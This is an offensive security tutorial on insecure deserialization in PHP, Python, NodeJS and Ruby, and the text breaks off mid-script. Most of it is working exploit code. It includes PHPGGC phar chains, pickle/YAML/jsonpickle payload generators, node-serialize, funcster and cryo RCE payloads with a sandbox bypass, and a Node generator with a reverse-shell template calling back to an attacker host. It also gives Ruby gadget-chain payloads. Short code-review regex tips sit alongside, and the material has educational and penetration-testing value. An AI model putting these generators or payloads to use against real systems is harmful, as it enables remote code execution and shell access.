Generate payloads dynamically: PHPGGC

In the previous section, it was stated that it is not really feasible to generalise the exploitation of PHP application using POP gadget chains. However, within the years, a good number of POP gadgets (framework specific), have been identified and collected in an unofficial PHP version of ysoserial, PHPGGC.

As ysoserial, this is an extremely powerful tool, which can automatically create gadget chains for many different PHP frameworks, such as:

Drupal7
Wordpress
ZendFramework
Slim
Laravel
Magento
Guzzle
… others

As mentioned, the example application uses Slim, Guzzle and Yii. Conveniently, the three are among PHPGCC supported gadget chains:

$ phpggc -l

Gadget Chains
-------------

NAME                                      VERSION                        TYPE             VECTOR         I
Guzzle/RCE1                               6.0.0 <= 6.3.2                 rce              __destruct     *
Slim/RCE1                                 3.8.1                          rce              __toString
Yii/RCE1                                  1.1.20                         rce              __wakeup       *

To exploit the deserialization induced by phar://, a malicious phar file must be generated, then passed to application using the phar wrapper as part of the name. The phar wrapper will force the file to be deserialized, starting a POP chain that will eventually lead to RCE. A valid payload may be generated using the following command:

$ phpggc Guzzle/RCE1 "shell_exec" "cmd /c calc" -p phar -pf desert -o desert.phar

Then, the payload can be tested launching the vulnerable script, giving as input the payload, prefixed with the phar wrapper:

$ php php-wrap-desert.php -fphar://desert.phar/desert -p

Doing that will spawn a calculator on the hosting machine.

The other serialization vulnerability can be exploited in a similar way, the only things to notice is the following:

Even though PHPGGC has a Slim RCE gadget chain, if the print function is disabled (commented), it won’t work. It may be obvious, but Slim uses __toString to trigger the POP chain, hence it won’t be able to do that without a string operation. To try it, create a payload like the following:

$ phpggc Slim/RCE1 "system" "cmd /c calc" -o desert.bin

Try to run it, via the following command:

$ php php-wrap-desert.php -fdesert.bin

Nothing will happen. Enabling the print function and retrying, a calculator will spawn on the hosting machine.

Tips for Source Code reviewers

To find this kind of vulnerability it is usually a good start to search the code for common regexes, like:

unserialize
__wakeup
__destruct

For each match of unserialize, the code should be manually inspected to see whether the object being deserialized can be manipulated by an external attacker. After that, a research of suitable classes for exploitation might start with researching for __wakeup and __destruct calls.

Python

Python as well offers built-in support for serialization/deserialization, with many libraries that can easily marshal an object using different archive-formats, as binary, XML, JSON, YAML, and so on. Within the years, a few modules were found to be affected by unsafe deserialization issues. Those were:

pickle, handling binary serialization
pyYAML, handling YAML serialization
jsonpickle, handling JSON serialization

Python: Binary Archive Format

In Python, the main library handling Binary serialization is Pickle (provided in different packages, as cPickle, pickle and _pickle). This library is known to be affected by an RCE upon deserialization.

Considering the following piece of code:

import os
import _pickle

class Desert(object):
    def __init__(self, name, width, heigth):
        self.name = name
        self.width = width
        self.height = height

    def __reduce__(self):
        return Desert("Gobi", 8, 10)

# The application insecurely deserializes a file
def desert_deserialize(filename):
    with open(filename, "r") as desert_file:
        _pickle.loads(desert_file)

if __name__ == '__main__':
    desert = desert_deserialize()

As you can see, pickle load() function is called without any prior check on the file content, allowing an attacker to pass an arbitrary binary payload to the application.

How can that be exploited? In Python, no tool like ysoserial is available, and there is no clear definition of POP gadget as it was for the previous analysed languages, but in this context, there is no need for them at all.

Indeed, for pickle, _pickle and cPickle, a payload may be crafted using a simple piece of code, like the following:

import _pickle

class Payload(object):
    def __reduce__(self):
        return (os.system, ('whoami',))

def serialize_exploit():
    shellcode = _pickle.dumps(Exploit())
    return shellcode

Changing the return function, it would be possible to generate the payload needed to execute different commands. However, it is more than possible to create something way more general than this, using various techniques, the first we’ll see is known as dynamic class generation, code below:

import os
import _pickle
import sys

def Payload:
    pass

    def __reduce__(self):
        pass

def _patch(bytestream):
    byte_array = bytearray(bytestream)
    byte_array[-4] = int("52", 16)
    return bytes(byte_array)

def generate_class(name=None, methods=None):
    if not name:
        return None
    elif not methods:
        return None
    else:
        return type(name, (object,), methods)()

def serialize_class(commands):
    if not commands:
        print(f"[-] No command provided")
    else:
        methods = {
            "__reduce__": lambda self: (os.system, (commands,))
        }
        cls = generate_class("Payload", methods)
        return cls.__reduce__()

command = " ".join(sys.argv[1:])
print(f"[+] Generating serialized object for:")
print(f"    {command}")

with open("payload", "wb") as payload:
    payload.write(_patch(_pickle.dumps(serialize_class(command))))

As you may notice, a function called _patch is applied to the serialized object, applying a patch to the binary archive after serialization. This trick has been used because the lambda function, although being bound to the attribute __reduce__ is not interpreted as the reduce method, but as a lambda function:

Static definition

>>> print(Payload.__getattribute__(Payload(), "__reduce__"))
<bound method Payload.__reduce__ of <__main__.Payload object at 0x00000209218B9518>>

Dynamic definition

>>> cls = generate_class("Payload", methods)
>>> print(cls.__getattribute__("__reduce__"))
<bound method serialize_class.<locals>.<lambda> of <__main__.Payload object at 0x00000209218B9080>>

Although that would not stop the serialization, it would cause the payload to not be executed upon deserialization. However, the _patch function successfully fix this issue at byte-code level, making the payload executable again.

There is, however, a nicer way of achieving the same results, keeping the good part (setting arbitrary commands), and avoiding the bad one (dynamic class definition and patching), but it will be showed later, as well as a complete payload generator for both binary and text-based formats.

Python: Text-Based Archive Format

Several different libraries are offered by Python which support text-based serialization archives, such as json (or simplejson), or ETree (for XML). Even though most of these libraries are known to be secure, a few of them are susceptible to this kind of attack. In the following paragraphs, a brief explaination is given about how the text-based serialization works, how to exploit it, and how to generate custom payloads.

YAML

PyYAML, as its name suggests, it is a library to handle the YAML format. As previously stated, it was found to be vulnerable to deserialization issues.

The following example shows a very simple object being serialized from the python console:

>>> yaml.dump([{"a":"b"}])
'- a: b\n'
>>> yaml.dump([{"a":("b","c")}])
'- a: !!python/tuple\n  - b\n  - c\n'

Analyse the serialized object is not difficult, dict and lists are handled nicely, while other object must be serialized with their class notation. The above object, for example, would be translated as:

-                 ==== [ 
a :!!python/tuple ==== {a : tuple(
- b - c           ==== b, c
                  ==== )}
                  ==== ]

In order to serialize an arbitrary class, the __reduce__ method must be implemented, in a similar way it was for pickle.

How does the exploitation works? Considering the following vulnerable code:

import yaml

# Try to create the desert object from YAML file
with open('desert.yml') as desert_file:
    if float(yaml.__version__) <= 5.1: 
        desert = yaml.load(desert_file)
    else:
        desert = yaml.unsafe_load(desert_file)
# Try printing the desert name
print(desert['name'])

The careful reader may appreciate the version check before the actual call to load. This was done on purpose because from PyYAML >= 5.1, the load function was patched to avoid “function” deserialization (e.g. os.system, subprocess.call, subprocess.check_output). However, it may still be possible to exploit it using non function based vectors as subprocess.Popen. A very nice explaination on that can be found here. The main concept is the always the same: tricking the application into loading arbitrary classes/methods. In the case of PyYAML, the following payload can be used to spawn a calculator on the hosting server:

!!python/object/apply:nt.system
- cmd /c calc

This simple payload can be easily created using the following code:

import yaml, os

class Payload:
    def __reduce__(self):
        return (os.system, ("cmd /c calc.exe",))
    
yaml.dump(Payload())

JSON

The same vulnerability already studied in pickle can be applied to jsonpickle. As the name may suggest, the jsonpickle module is actually a json library built on top of pickle. The deserialization issue is located in the decode() function call, as it may be seen in the following vulnerable code snippet:

import jsonpickle

with open("payload.json", "r") as payload:
    jsonpickle.decode(payload.read())

Analysing the function call using a tracing function, it is possible to see that the module calls actually the vulnerable function loads. To confirm that, the following snippet may be used:

import sys
import jsonpickle
import re


def trace(frame, event, arg):
    if event != 'call':
        return
    c_object = frame.f_code
    func_name = c_object.co_name
    if not re.search(r"load", func_name):
        return
    func_name_line_no = frame.f_lineno
    func_filename = c_object.co_filename
    caller = frame.f_back
    caller_line_no = caller.f_lineno
    caller_filename = caller.f_code.co_filename
    print('Call to {0} on line {1} of {2} from line {3} of {4}'.format(func_name, func_name_line_no, func_filename,caller_line_no, caller_filename))


with open("payload.json", "r") as payload:
    sys.settrace(trace)
    jsonpickle.decode(payload.read())

Which would produce the following results:

$ python tracer.py

Call to loads on line 299 of C:\Users\amagnosi\AppData\Local\Programs\Python\Python37\lib\json\__init__.py from line 207 of C:\Users\amagnosi\PycharmProjects\PayloadGenerator\venv\lib\site-packages\jsonpickle\backend.py
Call to loadclass on line 600 of C:\Users\amagnosi\PycharmProjects\PayloadGenerator\venv\lib\site-packages\jsonpickle\unpickler.py from line 326 of C:\Users\amagnosi\PycharmProjects\PayloadGenerator\venv\lib\site-packages\jsonpickle\unpickler.py

As for the previous two modules, the serialization process uses __reduce__ to create the serialized representation of the object. Generate a working exploit is as easy as it was for PyYAML, and can be done using the following code:

import jsonpickle

class Payload:
    def __reduce__(self):
        return (os.system, ("cmd /c calc.exe",))
    
jsonpickle.encode(Payload())

That’s seems interesting, but it would be nicer to generate serialized payloads without rewriting the code anytime a different command is needed, right? Below, a way to dynamically generate valid payloads for all the python modules listed above is presented.

Generate payloads dynamically: deser-py

The following tool, called deser-py, can be used to generate different payloads for pickle, yaml and jsonpickle. An updated version of the tool can be also downloaded here.

import os
import _pickle
import subprocess
import jsonpickle
import sys
import yaml
import argparse


class Payload:
    def __init__(self, commands, vector=None):
        self.vector = vector
        self.commands = commands

    def __reduce__(self):
        if self.vector == "os":
            return os.system, (self.commands,)
        elif self.vector == "subprocess":
            return subprocess.Popen, (self.commands,)


def print_available_formats():
    available_formats = {
        "pickle": "Format for cPickle and _pickle modules",
        "json": "Format for jsonpickle module",
        "yaml": "Format for PyYAML module"
        }
    for k, v in available_formats.items():
        print(f"    {k}: {v}")


if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description='deser-py - A simple serialization payload generator', add_help=True)

    parser.add_argument(
        '-d', '--debug', required=False, action='store_true', default=False,
        help='Enable debug messages')
    parser.add_argument(
        '-s', '--save', required=False, action='store_true', default=False,
        help='Save payload to file')
    parser.add_argument(
        '-v', '--vector', required=False, choices=["os", "subprocess"], default="os",
        help='Save payload to file')
    parser.add_argument(
        '-f', '--format', required=True, choices=["pickle", "json", "yaml", "#"], default="#",
        help='Serialization archive format')
    parser.add_argument(
        '-c', '--command', type=str, required=False, default=None, help='Command for the payload')

    args = parser.parse_args()

    if args.format == "#":
        print(f"[*] The following format are accepted:")
        print_available_formats()
        sys.exit()
    if not args.command:
        print(f"[-] A command (-c) is required to generate the payload")
    command = args.command

    print(f"[+] Generating serialized object for:")
    print(f"    {command}")
    cls = Payload(command, args.vector)

    if args.format == "pickle":
        if args.save:
            with open("payload.bin", "wb") as payload:
                payload.write(_pickle.dumps(cls))
        else:
            print(f"[+] Final Payload:\n    {_pickle.dumps(cls)}")
    elif args.format == "json":
        if args.save:
            with open("payload.json", "w") as payload:
                payload.write(jsonpickle.encode(cls))
        else:
            print(f"[+] Final Payload:\n    {jsonpickle.encode(cls)}")
    elif args.format == "yaml":
        if args.save:
            with open("payload.yml", "w") as payload:
                yaml.dump(cls, payload)
        else:
            p = yaml.dump(cls).replace('\n', '\n    ')
            print(f"[+] Final Payload:\n    {p}")
    else:
        sys.exit()

The functions provided by this simple tool can be inspected using the help:

$ python PayloadGenerator.py -h
usage: PayloadGenerator.py [-h] [-d] [-s] [-v {os,subprocess}] -f {pickle,json,yaml,#} [-c COMMAND]

PayloadGenerator - A simple serialization payload generator

optional arguments:
  -h, --help            show this help message and exit
  -d, --debug           Enable debug messages
  -s, --save            Save payload to file
  -v {os,subprocess}, --vector {os,subprocess}
                        Save payload to file
  -f {pickle,json,yaml,#}, --format {pickle,json,yaml,#}
                        Serialization archive format
  -c COMMAND, --command COMMAND
                        Command for the payload

To test payloads, and for simplicity, the following vulnerable code can be used:

import _pickle
import sys
import yaml
import jsonpickle

if sys.argv[1] == "b":
    with open("payload.bin", "rb") as payload:
        _pickle.loads(payload.read())
elif sys.argv[1] == "y":
    with open("payload.yml", "r") as payload:
        if float(yaml.__version__) <= 5.1: 
            yaml.load(payload)
        else:
            yaml.unsafe_load(payload)
elif sys.argv[1] == "j":
    with open("payload.json", "r") as payload:
        jsonpickle.decode(payload.read())

To generate a valid payload for jsonpickle, for example, the following command can be used:

$ python PayloadGenerator.py -f json -v os -c "cmd /c calc"
[+] Generating serialized object for:
    cmd /c calc
[+] Final Payload:
    {"py/reduce": [{"py/function": "nt.system"}, {"py/tuple": ["cmd /c calc"]}]}

Tips for Source Code reviewers

To find this kind of vulnerability it is usually a good start to search the code for common regexes, like:

(loads|load|unsafe_load|decode)\s*\(
([p|P]ickle|yaml)

For each match, the code should be manually inspected to see whether the object being deserialized can be manipulated by an external attacker.

NodeJS

In NodeJS, serialization is handled by many different modules, which allow to marshal arbitrary complex objects in JSON-like format. A few of them, which were found to be susceptible to deserialization issues, are of interest for this article, and are:

node-serialize
serialize-to-js
funcster

Before starting digging into the vulnerabilities, it should be clear to the reader that this kind of issues in JavaScript behave way differently in comparison to previous examples. No POP gadget chain is required to trigger RCE or sort of. Why so? Usually, bug of this type in JavaScript arises because the serialized payload is passed to functions like eval(), or new Function(), which implies that arbitrary code may be executed by the application.

NodeJS: Text-based archive format

node-serialize

The first NodeJS module under analysis is node-serialize. In 2017, a researcher named Ajin Abraham found that this module allowed deserialization of function objects in a non-safe way, leading to RCE.

If tested, it is possible to see that node-serialize serializes objects using regular JSON format. The question that may arise would be, why not JSON.stringify(), then? The reason being that JSON cannot really serialize functions.

For this reason, if an object containing a functional literal is serialized with JSON.stringify, the literal would be lost:

node -e "console.log(JSON.stringify({'a':function(){console.log('HELLO!');}}));"

{}

While if serialized with node-serialize, the result would be the following:

$ node -e "console.log(require('node-serialize').serialize({'a':function(){console.log('HELLO!');}}));"

{"a":"_$$ND_FUNC$$_function(){console.log('HELLO!');}"}

The problem arises, of course, during the deserialization process, because to reverse the function back, node-serialize would pass any object prefixed with _$$ND_FUNC$$_ to eval, as can be seen from the following snippet:

// https://github.com/luin/serialize/blob/master/lib/serialize.js
if(obj[key].indexOf(FUNCFLAG) === 0) {
    obj[key] = eval('(' + obj[key].substring(FUNCFLAG.length) + ')');
}

Which meanse that if a serialized object, like the following, is deserialized by node-deserialize:

{"rce":"_$$ND_FUNC$$_function() { CMD = \"cmd /c calc\"; require('child_process').exec(CMD, function(error, stdout, stderr) { console.log(stdout) }); }()"}

The application would execute an arbitrary command on the target machine (in this case, spawn a calculator on a Windows box).

funcster

The funcster module is also affected by a deserialization vulnerability. However, this time, the vulnerability is triggered via module.exports and executed within a sandboxed environment:

// https://github.com/jeffomatic/funcster/blob/master/js/lib/funcster.js
_generateModuleScript: function(serializedFunctions) {
     var body, entries, name;
     entries = [];
     for (name in serializedFunctions) {
       body = serializedFunctions[name];
       entries.push("" + (JSON.stringify(name)) + ": " + body);
     }
     entries = entries.join(',');
     return "module.exports=(function(module,exports){return{" + entries + "};})();";
   },
...
vm.createScript(script, opts.filename).runInNewContext(sandbox);
return sandbox.module.exports;

For this reason, it is not possible to call a function as require() directly. However, the process is still exploitable via sandbox bypassing. The common technique to achieve that is to access global objects via this.constructor.costructor. This payload can be used to achieve RCE on an application using require('funcster').unserialize():

{"rce":{"__js_function":"function(){CMD=\"cmd /c calc\";const process = this.constructor.constructor('return this.process')();process.mainModule.require('child_process').exec(CMD,function(error,stdout,stderr){console.log(stdout)});}()"}}

cryo

The last module analysed is cryo. This library, as explicitly stated on the module website, extends the JSON functionalities offering complex object and function serialization.

This library is not directly vulnerable to RCE via deserialization, because it properly handles function and complex objects. However, it allows for object prototypes redefinition. As the reader may know, any object in JavaScript holds is own properties and methods. Usually, it’s not possible to add properties to an existing object constructor, however, JavaScript prototype allows to add/redefine properties or methods at runtime, without adding them via the default constructor. Additionally, it is possible to access the Object.prototype property using the __proto__ property.

The __proto__ property of Object.prototype is an accessor property (a getter function and a setter function) that exposes the internal [[Prototype]] (either an object or null) of the object through which it is accessed.

Manipulating the __proto__ property, then, it may be possible to overwrite/redefine standard methods of the object to deserialize, such as toString() or valueOf(). In that case, what would happen if the following JSON payload was deserialized?

{
    "root":"_CRYO_REF_2",
    "references":[{
        "contents":{},
        "value":"_CRYO_FUNCTION_function(){ CMD = \"cmd /c calc\"; const process = this.constructor.constructor('return this.process')();process.mainModule.require('child_process').exec(CMD, function(error, stdout, stderr) { console.log(stdout) });}()"
    },
    {
        "contents":{"toString":"_CRYO_REF_0"},
        "value":"_CRYO_OBJECT_" },
    {
        "contents":{"__proto__":"_CRYO_REF_1"},
        "value":"_CRYO_OBJECT_"        
    }]
}

During deserialization, cryo would redefine the toString() function, via __proto__ accessor. If later on the application tried calling the toString() method of the deserialized object, the RCE function would be called instead. Of course, any object method may be overwritten, toString is just an example.

Generate payloads dynamically: deser-node

As for other languages, it would be handy to have a tool to automatically generate suitable payloads. In order to do that, the following script was created, named desert-node. The tool can be used to generate different payloads for the libraries prensented in this article. An updated version of the tool can also be downloaded here.

/**
* This script provides a simple cli to generate payloads for:
* - node-serialize
* - funcster
* - cryo
*
* It's not meant to be a complete tool, but just a proof of concept
**/
var fs = require('fs');

var argv = require('yargs')
    .usage('Usage: $0 -f [file] [options]')
    .alias('f', 'file')
    .alias('m', 'mode')
    .alias('s', 'serializer')
    .alias('v', 'vector')
    .alias('c', 'command')
    .alias('H', 'lhost')
    .alias('P', 'lport')
    .alias('t', 'target')
    .alias('p', 'cryoprototype')
    .alias('h', 'help')
    .choices('s', [, 'ns', 'fstr', 'cryo'])
    .choices('m', ['serialize', 'deserialize'])
    .choices('v', ['rce', 'rshell'])
    .choices('t', ['linux', 'windows'])
    .default('t', 'windows')
    .default('p', 'toString')
    .default('s', 'ns')
    .default('m', 'serialize')
    .describe('f','Input file')
    .describe('m','Operational mode, may be serialize or deserialize')
    .describe('s','The serializer module to use')
    .describe('v','The vector is command exe or reverse shell')
    .describe('c','The command to execute (-v rce must be used)')
    .describe('e','Charencode the payload (not implemented yet)')
    .describe('H','Local listener IP (-v rshell must be used)')
    .describe('P','Local listener PORT (-v rshell must be used)')
    .describe('t','Target machine OS, may be Win or Linux')
    .demandOption(['f'])
    .showHelpOnFail(false, "Specify --help for available options")
    .argv;

var payload;

// Serialize function wrap
function serialize(serializer, object) {
    if (serializer == "fstr") {
        var serialize = require('funcster');
        return JSON.stringify(serialize.deepSerialize(object),null,0);
    } else if (serializer == "ns") {
        return require('node-serialize').serialize(object);
    } else if (argv.serializer == "cryo") {
        return require('cryo').stringify(object);
    }
}

// Deserialize function wrap
function deserialize(serializer, object) {
    if (serializer == "fstr") {
        return require('funcster').deepDeserialize(object);
    } else if (serializer == "ns") {
        return require('node-serialize').unserialize(object);
    } else if (argv.serializer == "cryo") {
        return require('cryo').parse(object);
    }
}

/* As dynamic commands couldn't be added during serialization,
*  these tags were applied to payload templates to allow dynamic
*  configuration 
*/
cmd_tag = /####COMMAND####/g;
lhost_tag = /####LHOST####/g;
lport_tag = /####LPORT####/g;
shell_tag = /####SHELL####/g;
sentinel_tag = /\/\/####SENTINEL####\s*}/g;
proto_tag=/function_prototype/g;

//BEGIN - Payload Template Generation
if (argv.vector == "rshell" && argv.serializer != "cryo") {
    if (typeof argv.lport == 'undefined' || typeof argv.lhost == 'undefined') {
        console.log("[-] RShell vector requires LHOST and LPORT to be specified");
        process.exit();
    }
    payload = {
        rce: function() {
            var net = require('net');
            var spawn = require('child_process').spawn;
            HOST = "####LHOST####";
            PORT = "####LPORT####";
            TIMEOUT = "5000";
            if (typeof String.prototype.contains === 'undefined') {
                String.prototype.contains = function(it) {
                    return this.indexOf(it) != -1;
                };
            }

            function c(HOST, PORT) {
                var client = new net.Socket();
                client.connect(PORT, HOST, function() {
                    var sh = spawn("####SHELL####", []);
                    client.write("Connected!");
                    client.pipe(sh.stdin);
                    sh.stdout.pipe(client);
                    sh.stderr.pipe(client);
                    sh.on('exit', function(code, signal) {
                        client.end("Disconnected!");
                    });
                });
                client.on('error', function(e) {
                    setTimeout(c(HOST, PORT), TIMEOUT);
                });
            }
            c(HOST, PORT);//####SENTINEL####
        }
    }
} else if (argv.vector == "rshell" && argv.serializer == "cryo") {
    if (typeof argv.lport == 'undefined' || typeof argv.lhost == 'undefined') {
        console.log("[-] RShell vector requires LHOST and LPORT to be specified");
        process.exit();
    }
    payload = {
        __proto: {
            function_prototype: function() {
                var net = require('net');
                var spawn = require('child_process').spawn;
                HOST = "####LHOST####";
                PORT = "####LPORT####";
                TIMEOUT = "5000";
                if (typeof String.prototype.contains === 'undefined') {
                    String.prototype.contains = function(it) {
                        return this.indexOf(it) != -1;
                    };
                }

                function c(HOST, PORT) {
                    var client = new net.Socket();
                    client.connect(PORT, HOST, function() {
                        var sh = spawn('####SHELL####', []);
                        client.write("Connected!");
                        client.pipe(sh.stdin);
                        sh.stdout.pipe(client);
                        sh.stderr.pipe(client);
                        sh.on('exit', function(code, signal) {
                            client.end("Disconnected!");
                        });
                    });
                    client.on('error', function(e) {
                        setTimeout(c(HOST, PORT), TIMEOUT);
                    });
                }
                c(HOST, PORT);//####SENTINEL####
            }
        }
    }
} else if (argv.vector == "rce" && argv.serializer != "cryo") {
    if (typeof argv.command == 'undefined') {
        console.log("[-] RCE vector requires a command to be specified");
        process.exit();
    }
    payload = {
        rce: function() {
            CMD = "####COMMAND####";
            require('child_process').exec(CMD, function(error, stdout, stderr) {
                console.log(stdout)
            });//####SENTINEL####
        },
    }
} else if (argv.vector == "rce" && argv.serializer == "cryo") {
    if (typeof argv.command == 'undefined') {
        console.log("[-] RCE vector requires a command to be specified");
        process.exit();
    }
    payload = {
        __proto: {
            function_prototype: function() {
                CMD = "####COMMAND####";
                require('child_process').exec(CMD, function(error, stdout, stderr) {
                    console.log(stdout)
                });//####SENTINEL####
            }
        }
    }
} else {
    payload = {
        rce: function() {
            require('child_process').exec('cmd /c calc', function(error, stdout, stderr) {
                console.log(stdout)
            });//####SENTINEL####
        },
    }
}
//END - Payload Template Generation

//BEGIN - Payload Customization
if (argv.mode == "serialize") {
    var serialized_object = serialize(argv.serializer, payload);
    if (argv.serializer == "cryo") {
        // Prototype rewriting
        serialized_object = serialized_object.replace("__proto", "__proto__");
    }
    // Beautify
    serialized_object = serialized_object.replace(/(\\t|\\n)/gmi, "");
    serialized_object = serialized_object.replace(/(\s+)/gmi," ");
    // Setting up CMD (if applicable)
    serialized_object = serialized_object.replace(cmd_tag, argv.command);
    // Setting up RSHELL (if applicable)
    serialized_object = serialized_object.replace(lhost_tag, argv.lhost);
    serialized_object = serialized_object.replace(lport_tag, argv.lport);
    // Setting up shell basing on OS
    if (argv.target == "windows") {
        serialized_object = serialized_object.replace(shell_tag, "cmd");
    } else if (argv.target == "linux") {
        serialized_object = serialized_object.replace(shell_tag, "/bin/sh");
    }
    // Making payload executable with "()"
    if(serialized_object.includes("####SENTINEL####")){
        serialized_object = serialized_object.replace(sentinel_tag, '}()');
    } else {
        serialized_object = serialized_object.replace('"}}', '()"}}');
    }
    if (argv.serializer == "fstr" || argv.serializer == "cryo") {
        if(argv.serializer == "cryo"){
            serialized_object = serialized_object.replace(proto_tag, argv.cryoprototype);
        }
        if (argv.vector == "rce") {
            // Modifying RCE payload to bypass the sandbox via this.constructor.constructor
            serialized_object = serialized_object.replace("require('child_process')", "const process = this.constructor.constructor('return this.process')();process.mainModule.require('child_process')");
        } else if (argv.vector == "rshell") {
            // Modifying RSHELL payload to bypass the sandbox via this.constructor.constructor
            serialized_object = serialized_object.replace("var net=require('net');var spawn=require('child_process').spawn;", "const process = this.constructor.constructor('return this.process')();var spawn=process.mainModule.require('child_process').spawn;var net=process.mainModule.require('net');");
            serialized_object = serialized_object.replace("var net = require('net');var spawn = require('child_process').spawn;", "const process = this.constructor.constructor('return this.process')();var spawn=process.mainModule.require('child_process').spawn;var net=process.mainModule.require('net');");
        }
    }
    // Debug check
    console.log(serialized_object);
    // Storing on file
    fs.writeFile(argv.file, serialized_object, function(err) {
        if (err) throw err;
        console.log('[+] Serializing payload');
    });
} else if (argv.mode == "deserialize") {
    // Reading payload from file
    fs.readFile(argv.file, function(err, data) {
        if (err) throw err;
        console.log('[+] Deserializing payload');
        var object = data;
        // cryo handles JSON directly - no need to JSON.parse
        if (argv.serializer != "cryo") {
            object = JSON.parse(data);
        }
        console.log(object);
        // Triggering RCE
        var deser = deserialize(argv.serializer, object);
        // Triggering RCE for Cryo
        deser.toString();
    });
}

Tips for Source Code reviewers

For NodeJS application, it’s very difficult to advice on common strategies to get this kind of issues, as many libraries exist and many may be created in the future. Even though, as a general recommendation, it is usually a good idea to start searching the code for common regexes, like:

(unserialize|parse)\s*\(
(node-serialize|funcster|serialize-to-js|cryo)

For each match, the code should be manually inspected to see whether the object being deserialized can be manipulated by an external attacker.

Ruby

Ruby, as all the programming languages seen previously, offer serialization support, both hybrid (with Marshal) and pure text-based (mainly JSON or YAML). Within the years, two main vulnerabilities were found in Ruby that allowed RCE during the deserialization process. The affected functions were:

Marshal.load()
YAML.load()

Ruby: Binary Archive Format

Marshal

Originally, this vulnerability was found by Charlie Somerville during a research against Ruby on Rails, which leaded to the discovery of a gadget chain based on the rails module. However, the chain as it was, presented some major drawbacks:

ActiveSupport gem must be loaded
ERB from stdlib must be loaded
After deserialization, a method that doesn’t exist must be called on the deserialized object

The above fallbacks doesn’t affect the payload from working within Ruby on Rails app, as the requirements are easily fulfilled. However, they would be show stoppers for any other Ruby Application. To test it, the following command might be used, seeing that it works only if rails/all had been previously loaded:

Without require 'rails/all'

$ ruby -e 'Marshal.load("\u0004\bo:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\a:\u000E@instanceo:\bERB\u0006:\t@srcI\"\u0018eval(`puts \"TEST\"`)\u0006:\u0006ET:\f@method:\vresult")'

Traceback (most recent call last):
        1: from -e:1:in `<main>'
-e:1:in `load': undefined class/module ActiveSupport:: (ArgumentError)

With require 'rails/all'

$ ruby -e 'require "rails/all";Marshal.load("\u0004\bo:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\a:\u000E@instanceo:\bERB\u0006:\t@srcI\"\u0018eval(`puts \"TEST\"`)\u0006:\u0006ET:\f@method:\vresult")'

# May result in TypeError: Implicit Conversion of nil to int (in this case downgrade Ruby)
TEST

However, a relatively new research, made by Luke Jahnke, lead to the discovery of a POP gadget chain working with Ruby standard libs only, without any previous requirement and not relying on any additional module.

As described in the original research, which can be found here, the POP gadget chain is built leveraging functions which then results in the Kernel.open being called with an arbitrary command. The full execution path can be summarised as following:

Gem::Requirement -> calls @requirements.each (list of object)
Gem::DependencyList -> used as list, calls @specs.sort (sort requires a comparator)
Gem::Source::SpecificFile -> implements a suitable comparator (<=> three way comparison operator) that calls @spec.name
Gem::StubSpecification -> implementation of name calls data.name -> calls Kernel.open(@loaded_from)
RCE is achieved by manipulating @loaded_from with a command

The script provided by the researcher, generates the hex version and the base64 version of the payload, for the static command “id”. The payload may be found even on PayloadAllTheThings.

To test it, it is enough to launch the following command:

$ ruby -e 'Marshal.load(["0408553a1547656d3a3a526571756972656d656e745b066f3a1847656d3a3a446570656e64656e63794c697374073a0b4073706563735b076f3a1e47656d3a3a536f757263653a3a537065636966696346696c65063a0a40737065636f3a1b47656d3a3a5374756253706563696669636174696f6e083a11406c6f616465645f66726f6d4922167c636d64202f632063616c6320313e2632063a0645543a0a4064617461303b09306f3b08003a1140646576656c6f706d656e7446"].pack("H*")) rescue nil'

However, the script provided shows a list of drawbacks:

Executes the payload on the attacker machine multiple times
Does not offer dynamic generation (with custom commands)
Can be used only for Marshal payloads

Ruby: Text-Based archive format

YAML

It may sound trivial, but the same chain can be applied to the YAML.load() function as well. If you accessed PayloadAllTheThings previously, you probably noticed the following YAML payload:

--- !ruby/object:Gem::Requirement
requirements:
  !ruby/object:Gem::DependencyList
  specs:
  - !ruby/object:Gem::Source::SpecificFile
    spec: &1 !ruby/object:Gem::StubSpecification
      loaded_from: "|id 1>&2"
  - !ruby/object:Gem::Source::SpecificFile
      spec:

Now, if you pay attention at it, you will easily understand that it’s working exactly the same way as the previously explained payload for Marshal.

The payload has been created by another security researcher name Etienne Stalmans (aka STRAALDRAAD), his full research can be found here. However, a as you can read from his research, the payload was created “manually”. If you wonder why, the research explained that using the original script for the Marshal payload, of course changing the call to Marshal.dump with YAML.dump, produced a not working (incomplete) payload. I was personally disappointed by this approach, as the script could easily be fixed. The main problem was the use of global variables ($-prefixed variables) with YAML.dump, which force the payload to be executed during serialization (which is necessary to generate the correct payload with Marshal.dump), but would prevent the yaml payload from being generated (as an exception would show before the end of the function). Transforming the global variable in a local one, and rebuilding the object for serialization, successfully solved the issue.

Generate payloads dynamically: deser-ruby

For the sake of completeness and to provide an example of what I said above, the following tool is provided, named desert-ruby, that could be used to dynamically generate valid payloads for both Marshal and YAML of Ruby, using the Universal Ruby 2.x RCE Gadget Chain. An up-to-date version of the tool can also be downloaded here.

#!/usr/bin/env ruby
require 'optparse'
require 'yaml'

Options = Struct.new(:save,:encode,:yaml,:command,:test)

class Parser
  def self.parse(options)
    args = Options.new("Ruby RCE deserialization payload generator")

    opt_parser = OptionParser.new do |opts|
      opts.banner = "Usage: serializer.rb [options]"

      opts.on("-sFILE", "--save=FILE", "File to store payload (default=payload)") do |f|
        args.save = f
      end
      opts.on("-y", "--yaml", "Generate YAML payload (default is False)") do |y|
        args.yaml = y
      end
      opts.on("-t", "--test", "Attempt payload deserialization") do |t|
        args.test = t
      end
      opts.on("-cCOMMAND", "--command=COMMAND", "Command to execute") do |c|
        args.command = c
      end
      opts.on("-eENCODE", "--encode=ENCODE", "Encode payload (base64|hex)") do |e|
        args.encode = e
      end
      opts.on("-h", "--help", "Prints this help") do
        puts opts
        exit
      end
    end

    opt_parser.parse!(options)
    return args
  end
end

class Tester
    def self.test(type, payload, payload_file)
        puts "[*] Deserializing payload "+ type +" in place"
        if type == "yaml" then
            # If we have an exception, we're quite sure we triggered the RCE
            YAML.load(File.read(payload_file)) rescue (puts "[+] Payload Executed Successfully")
        else
            Marshal.load(payload) rescue nil
        end
        puts "[*] Deserializing payload " + type + " in new process"
        if type == "yaml" then
            # If we triggered an exception above, this one should execute the command and print a visible result (and exception)
            cmd_string = "require 'yaml';YAML.load(File.read('"+payload_file+"'))"
            puts cmd_string
            puts IO.popen(["ruby","-e", cmd_string]).read
        else
            cmd_string = "'Marshal.load(STDIN.read) rescue nil'"
